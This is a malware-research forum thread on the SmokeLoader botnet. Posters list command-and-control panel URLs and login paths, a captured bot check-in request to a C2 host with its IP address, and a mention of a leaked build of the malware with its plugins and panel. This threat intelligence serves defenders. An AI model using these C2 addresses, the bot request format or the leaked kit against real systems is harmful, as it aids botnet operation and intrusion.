A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #13137  by leeno
 Thu May 10, 2012 9:22 pm
Live CnC Guest Login url for smokeloader

regmexicooo1.ru/ura/guest.php
razorbladesfuture.ru/images/guest.php
beaufortseaa139.ru/qad/guest.php
You do not have the required permissions to view the files attached to this post.
 #13139  by Xylitol
 Thu May 10, 2012 9:36 pm
Admin login: /control.php
The header of razorbladesfuture.ru and regmexicooo1.ru are different "smoke bot"
Code: Select all
http://razorbladesfuture.ru/images/imgs/header.png
this one is a smoke bot:
Code: Select all
http://beaufortseaa139.ru/qad/imgs/header.png
Anyway smoke bot or smoke loader have the same structure, or a difference.. smoke loader have a 'footer.png' when smoke bot don't have one.
 #14016  by Xylitol
 Sat Jun 16, 2012 7:48 am
GET /tmp/index.php?cmd=getload&login=783083C3BA00BE137&file=0&sel=77777
Host: italydveris.eu
• dns: 1 ›› ip: 91.217.162.45 - adresse: ITALYDVERIS.EU

https://www.virustotal.com/file/857fc7a ... /analysis/
Smoke Loader
You do not have the required permissions to view the files attached to this post.
 #28334  by marnie
 Sun Apr 17, 2016 1:57 pm
smoke 04.2016 leak (exe; plugins; panel)
You do not have the required permissions to view the files attached to this post.